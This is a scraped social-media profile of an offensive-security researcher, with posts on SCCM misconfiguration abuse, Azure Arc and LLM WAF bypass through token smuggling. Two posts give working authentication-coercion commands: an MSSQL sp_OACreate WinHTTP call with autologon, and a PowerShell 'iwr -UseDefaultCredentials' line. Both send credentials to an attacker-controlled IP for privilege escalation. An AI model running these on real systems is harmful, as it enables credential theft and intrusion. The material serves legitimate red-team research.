unsigned_sh0rt Profile Banner
Garrett Profile
Garrett

@unsigned_sh0rt

Followers
1K
Following
3K
Media
120
Statuses
1K

Research at @SpecterOps

Portland, OR
Joined August 2009
Don't wanna be here? Send us removal request.
@unsigned_sh0rt
Garrett
4 months
Non-infosec post this time. I try to stray away from talking about my personal life here as much as I can especially when it comes to my family. In November 2023 my son Oliver was diagnosed with level 3 Autism Spectrum Disorder.
3
6
36
@unsigned_sh0rt
Garrett
2 days
RT @G0ldenGunSec: Azure Arc is Microsoft's solution for managing on-premises systems in hybrid environments. My new blog covers how it can….
0
61
0
@unsigned_sh0rt
Garrett
5 days
Tweet media one
0
1
6
@unsigned_sh0rt
Garrett
5 days
Before shooting your shot though you can check if the DP you're targeting is setup with PKI certs for clients using RECON-6 and querying the value of DPCertType. 1 == self-signed, 2 == PKI
1
1
9
@unsigned_sh0rt
Garrett
5 days
Last week we added ELEVATE-4 to Misconfiguration Manager. tl;dr If SCCM uses AD CS for PKI, client auth certs are "borrowed" by clients during OSD. This will typically be a distribution point but could be the site server in all-in-one deployments. .
1
47
141
@unsigned_sh0rt
Garrett
6 days
RT @harmj0y: Happy Friday! @tifkin_ and I are happy to announce that we have cut the release for Nemesis 2.0.0 - check out the CHANGELOG fo….
0
38
0
@unsigned_sh0rt
Garrett
9 days
RT @SpecterOps: In the year since Misconfiguration Manager's release, the security community has been actively researching new tradecraft &….
0
33
0
@unsigned_sh0rt
Garrett
9 days
RT @subat0mik: Thanks to everyone who attended our (@unsigned_sh0rt) talk at @WEareTROOPERS! Here is the companion blog post: https://t.c….
0
22
0
@unsigned_sh0rt
Garrett
9 days
RT @SpecterOps: Are you at #TROOPERS25? Don't miss @subat0mik & @unsigned_sh0rt's follow-up to their talk last year, providing an update on….
0
5
0
@unsigned_sh0rt
Garrett
10 days
RT @Jonas_B_K: I publish two blog posts today! 📝🐫 . The first dives into how we're improving the way BloodHound models attack paths through….
0
68
0
@unsigned_sh0rt
Garrett
10 days
RT @SpecterOps: This is your reminder to join @Jonas_B_K's talk happening soon at #TROOPERS25! Hear how security boundaries become attack h….
0
6
0
@unsigned_sh0rt
Garrett
15 days
alias python3='python3 -W ignore'. 🙉🙈.
0
0
4
@unsigned_sh0rt
Garrett
17 days
RT @SkelSec: Well, it happened. The company I worked at for 6 years will be closing and thus I got laid off. This doesn't affect @octopwn o….
0
122
0
@unsigned_sh0rt
Garrett
22 days
RT @harmj0y: Thank you so much to @x33fcon and its organizers for an awesome experience! @tifkin_ and I had a blast talking about the new N….
0
68
0
@unsigned_sh0rt
Garrett
23 days
RT @SpecterOps: Did you catch Misconfiguration Manager: Overprivileged & Overlooked at #TROOPERS24? . @subat0mik & @unsigned_sh0rt will be….
0
7
0
@unsigned_sh0rt
Garrett
29 days
please. just stop
Tweet media one
3
1
9
@unsigned_sh0rt
Garrett
1 month
Really enjoyed hearing your initial thoughts behind this one start to finish. great work @_xpn_ !.
@SpecterOps
SpecterOps
1 month
🚨 New blog post alert!. @_xpn_ drops knowledge on LLM security w/ his latest post showing how attackers can by pass LLM WAFs by confusing the tokenization process to smuggle tokens to back-end LLMs.
0
2
11
@unsigned_sh0rt
Garrett
1 month
Yay HTTP auth. You can do similar tricks to trigger LDAP auth too. Bet stored procedure monitoring is rare.
Tweet media one
0
0
7
@unsigned_sh0rt
Garrett
1 month
Like this: . DECLARE @o INT; EXEC sp_OACreate 'WinHttp.WinHttpRequest.5.1', @o OUT; EXEC sp_OAMethod @o, 'open', NULL, 'GET', ' http://10.6.10.20', 'false'; EXEC sp_OAMethod @o, 'SetAutoLogonPolicy', NULL, 0; EXEC sp_OAMethod @o, 'send'; EXEC sp_OADestroy @o;.
1
0
15
@unsigned_sh0rt
Garrett
1 month
Turns out there are. Yeah there's CLR but If you're sysadmin/privileged/OLE already enabled and want to trigger HTTP auth you can use stored procedures and to create an autologon WinHTTP COM object.
1
0
6
@unsigned_sh0rt
Garrett
1 month
Friend recently used this trick posted by @M4yFly to pop a MSSQL box on a non-evasive using xp_cmdshell since EDR was being annoying. It made me curious if there were other ways to trigger HTTP auth for priv esc.
@M4yFly
Mayfly
1 year
Did you know you didn't need to use a potatoes exploit to going from iis apppool account to admin or system ?. Simply use: .powershell iwr http://192.168.56.1 -UseDefaultCredentials .To get an HTTP coerce of the machine account. 👇🧵
Tweet media one
1
24
131